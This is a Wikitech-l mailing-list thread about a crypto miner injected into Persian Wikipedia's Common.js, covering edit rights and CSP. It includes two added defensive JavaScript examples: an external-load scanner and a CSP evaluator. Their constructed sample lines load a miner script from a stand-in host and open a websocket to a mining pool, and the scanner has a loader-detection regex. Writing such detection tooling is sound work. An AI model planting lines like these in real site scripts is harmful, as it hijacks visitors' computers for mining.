Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-19 Thread David Gerard
This is particularly important for non-Wikimedia instances of MediaWiki, by the way. (e.g. on RationalWiki there's a cultural thing of "everyone is a sysop!" but the interface/JS editing rights are restricted to a much smaller "tech" group who are trusted not to be silly) - d. On 19 March

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-19 Thread Derk-Jan Hartman
On a side note: have we looked recently at decoupling the site-wide JS/CSS rights from the editinterface right? It has always seemed a bit weird to me that we had both these things in the MediaWiki namespace, but the more we are closing down raw HTML in the MediaWiki namespace, the weirder it becomes.

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Alex Monk
On Sat, 17 Mar 2018, 18:16 Chico Venancio, wrote: > Alex Monk wrote: > I don't think the communities actually want js injected without code-review > that much. They (we) do want to have easy access to gadget and scripts > though. > Attempting to impose any procedure

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Chico Venancio
Pine wrote: > I hope that there is a way that these suggestions are being tracked but I > don't see a public task for this on the Security workboard, possibly to > avoid announcing vulnerabilities in public until they have been assessed. There is the https://phabricator.wikimedia.org/T71445 that

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Alex Monk
You'd have to stop stewards from loading site-wide JS, gadgets, as well as removing their ability to have their user JS from pulling in JS from other sites/users/etc. somehow. Trying to restrict it would probably lead to a backlash from communities that would make superprotect look like a joke. I

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-17 Thread Pine W
Musikanimal, that sounds like a good suggestion to add to Phabricator. I hope that there is a way that these suggestions are being tracked, but I don't see a public task for this on the Security workboard, possibly to avoid announcing vulnerabilities in public until they have been assessed. Unless

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-16 Thread Leon Ziemba
Sorry to slightly sidetrack this discussion, but someone recently asked me if it were possible to modify a steward's user JS so that it granted them advanced rights like steward/checkuser/oversight. This of course is possible, but very rare since you need to be a sysop to edit these JS pages. The

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-15 Thread Eran Rosenthal
Lego already did a script to verify no external resources are loaded: https://phabricator.wikimedia.org/T71519 I think there is a Jenkins job running it on a regular basis. On Thu, Mar 15, 2018 at 6:30 AM, MZMcBride wrote: > David Gerard wrote: > >What ways are there to include
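An added example in the spirit of the check Eran describes; this is not the T71519 script and not MediaWiki code. It scans site JS (a constructed Common.js sample) for string literals that look like absolute or protocol-relative URLs and flags any whose host is not on an allowlist; the allowlist, the sample text and the list of loader calls it recognises are all assumptions made for the illustration.

```javascript
"use strict";

// Hosts a wiki is expected to load resources from (constructed allowlist).
const ALLOWED_HOSTS = new Set([
  "fa.wikipedia.org",
  "upload.wikimedia.org",
  "tools.wmflabs.org",
]);

// A quoted string literal that is an absolute (scheme://...) or
// protocol-relative (//...) URL. A real scanner would walk an AST; a
// regex is enough for the plain "load a script from somewhere else" case.
const URL_LITERAL = /(['"`])((?:[a-z][a-z0-9+.-]*:)?\/\/[^'"`\s]+)\1/g;

// Calls that turn a URL into executed code or an outbound connection.
const LOADER_CALLS =
  /(mw\.loader\.load|importScriptURI|\$\.getScript|\$\.ajax|fetch\(|new\s+WebSocket|XMLHttpRequest)/;

// Hostname of a URL, or null if it does not parse. Protocol-relative
// URLs get a scheme so URL() can parse them.
function hostOf(url) {
  try {
    const abs = url.startsWith("//") ? "https:" + url : url;
    return new URL(abs).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Return one finding per URL literal whose host is not allowlisted.
function findExternalLoads(source, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  source.split("\n").forEach((text, idx) => {
    for (const m of text.matchAll(URL_LITERAL)) {
      const url = m[2];
      const host = hostOf(url);
      if (host === null || allowedHosts.has(host)) continue;
      findings.push({
        line: idx + 1,
        host,
        url,
        // true when the literal sits on a line that also calls a loader
        viaLoader: LOADER_CALLS.test(text),
      });
    }
  });
  return findings;
}

// Constructed sample, not the deleted fawiki revision: one legitimate
// same-wiki gadget load, one allowlisted tool, one external script load
// and one websocket to a mining pool.
const SAMPLE_COMMON_JS = [
  "/* constructed sample Common.js */",
  "mw.loader.load('//fa.wikipedia.org/w/index.php?title=MediaWiki:Gadget-x.js&action=raw&ctype=text/javascript');",
  "importScriptURI('https://example-miner.invalid/lib/miner.min.js');",
  "var ws = new WebSocket('wss://pool.example-miner.invalid:8080/');",
  "$.getScript('https://tools.wmflabs.org/foo/bar.js');",
].join("\n");

for (const f of findExternalLoads(SAMPLE_COMMON_JS)) {
  console.log(`line ${f.line}: external host ${f.host}` +
    (f.viaLoader ? " (loader call on this line)" : ""));
}
```

Run with `node` to see the two findings (the external script and the websocket pool). A literal-only scan like this is easy to evade by assembling the URL at runtime (string concatenation, `atob`, `String.fromCharCode`), so it is a review aid for watching the MediaWiki namespace, not a control; the browser-enforced counterpart is a Content-Security-Policy, and note that a websocket to a pool is governed by connect-src rather than script-src.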

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-15 Thread Gergo Tisza
On Wed, Mar 14, 2018 at 9:14 AM, Jon Robson wrote: > It has always made me a little uneasy that there are wiki pages where > JavaScript could potentially be injected into my page without my approval. > To be honest if I had the option I would disable all site and user

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread MZMcBride
David Gerard wrote: >What ways are there to include user-edited JavaScript in a wiki page? > >[...] > >You can't see it now, but it was someone including a JavaScript >cryptocurrency miner in common.js! > >Obviously this is not going to be a common thing, and common.js is >closely watched. (The

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Jon Robson
It has always made me a little uneasy that there are wiki pages where JavaScript could potentially be injected into my page without my approval. To be honest if I had the option I would disable all site and user scripts for my account. Has this sort of thing happened before? Can we be sure there

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Lucas Werkmeister
A restrictive script-src in a Content-Security-Policy (RFC, T135963) could have helped with this. Alternatively, a report-mode CSP could at least have brought this to global
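An added example illustrating Lucas's point; it is not MediaWiki's CSP implementation and not the T135963 proposal. It models how a script-src directive decides whether a script URL is loaded and how a report-only policy reports the violation without blocking it. The page origin, the policy strings, the gadget and miner URLs and the report-uri endpoint are all constructed for the illustration.

```javascript
"use strict";

const DEFAULT_PORT = { "https:": "443", "http:": "80", "wss:": "443", "ws:": "80" };

// Pull the source list of the script-src directive out of a policy string.
// Returns null when there is no script-src (default-src fallback not modelled).
function scriptSrcSources(policy) {
  for (const directive of policy.split(";")) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0] === "script-src") return tokens.slice(1);
  }
  return null;
}

// Does one source expression permit this absolute script URL?
function sourceMatches(expr, pageOrigin, scriptUrl) {
  const u = new URL(scriptUrl);
  if (expr === "'none'") return false;
  if (expr === "'self'") return u.origin === pageOrigin;
  if (expr === "*") return u.protocol === "https:" || u.protocol === "http:";
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return u.protocol === expr.toLowerCase(); // scheme-source
  if (expr.startsWith("'")) return false; // 'unsafe-inline', nonces, hashes: not URL matchers

  // host-source: [scheme://][*.]host[:port][/path]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+|\*))?(\/.*)?$/i.exec(expr);
  if (!m) return false;
  const [, scheme, wildcard, host, port, path] = m;
  if (scheme) {
    if (u.protocol !== scheme.toLowerCase() + ":") return false;
  } else if (u.protocol !== "https:" && u.protocol !== new URL(pageOrigin).protocol) {
    return false; // no scheme in the expression: page scheme or https only
  }
  const h = u.hostname.toLowerCase();
  const want = host.toLowerCase();
  if (wildcard ? !h.endsWith("." + want) : h !== want) return false;
  if (port && port !== "*" && (u.port || DEFAULT_PORT[u.protocol]) !== port) return false;
  if (path && !u.pathname.startsWith(path)) return false;
  return true;
}

// Outcome for one script load. In report-only mode nothing is blocked,
// but a violation report is still sent to the policy's report endpoint.
function evaluateScript(policy, pageOrigin, scriptUrl, { reportOnly = false } = {}) {
  const sources = scriptSrcSources(policy);
  const permitted = sources === null ||
    sources.some((s) => sourceMatches(s, pageOrigin, scriptUrl));
  return { loaded: permitted || reportOnly, reported: !permitted };
}

// Constructed scenario: a wiki page, a same-wiki gadget and an external miner.
const PAGE_ORIGIN = "https://fa.wikipedia.org";
const GADGET_URL = "https://fa.wikipedia.org/w/load.php?modules=ext.gadget.x";
const MINER_URL = "https://example-miner.invalid/lib/miner.min.js";

// Weak policy: any host may serve scripts.
const PERMISSIVE = "script-src * 'unsafe-inline' 'unsafe-eval'";
// Restrictive policy: own origin plus Wikimedia hosts; the report-uri
// endpoint is an assumed path for this example.
const RESTRICTIVE =
  "script-src 'self' *.wikimedia.org 'unsafe-inline'; report-uri /w/api.php?action=cspreport";

for (const [name, policy] of [["permissive", PERMISSIVE], ["restrictive", RESTRICTIVE]]) {
  console.log(name, "miner:", evaluateScript(policy, PAGE_ORIGIN, MINER_URL),
    "miner (report-only):", evaluateScript(policy, PAGE_ORIGIN, MINER_URL, { reportOnly: true }));
}
```

Two caveats a practitioner would want alongside this: script-src only governs where script is fetched from, so a miner pasted inline into Common.js itself is first-party and passes 'self' (the outbound websocket to a pool is a connect-src matter, and the 'unsafe-inline' needed by existing wiki JS keeps inline code permitted); and report-only mode, as Lucas says, is about visibility, since the script still runs while the report lands.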

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Amir Ladsgroup
That already happened and the user got blocked indefinitely immediately after the incident. The JS was there for seven minutes, which is bad enough IMO. One thing is that the Persian Wikipedia community is working to strip the right of editing mediawiki ns from the templateeditor user group:

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Derk-Jan Hartman
In my opinion, such accounts should be globally blocked btw. It is a grave breach of trust and such accounts cannot be trusted anywhere else either. Thanks for playing, but goodbye for ever. DJ On Wed, Mar 14, 2018 at 3:42 PM, Brian Wolff wrote: > On Wednesday, March 14,

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Brian Wolff
On Wednesday, March 14, 2018, David Gerard wrote: > What ways are there to include user-edited JavaScript in a wiki page? > > I ask because someone put this revision in (which is now deleted): > >

Re: [Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread Yongmin H.
editinterface (usually only available to sysops on wmf wikis) is required to edit the MediaWiki: namespace, which includes MediaWiki:(blah).css/js. And edituser(css/js) is required to edit other users' CSS/JS files. In the fawiki case, these permissions are available to template editors, so once he

[Wikitech-l] What ways are there to include user-edited JavaScript in a wiki page? (threat model: crypto miners)

2018-03-14 Thread David Gerard
What ways are there to include user-edited JavaScript in a wiki page? I ask because someone put this revision in (which is now deleted): https://fa.wikipedia.org/w/index.php?title=%D9%85%D8%AF%DB%8C%D8%A7%D9%88%DB%8C%DA%A9%DB%8C:Common.js=next=22367460=en You can't see it now, but it was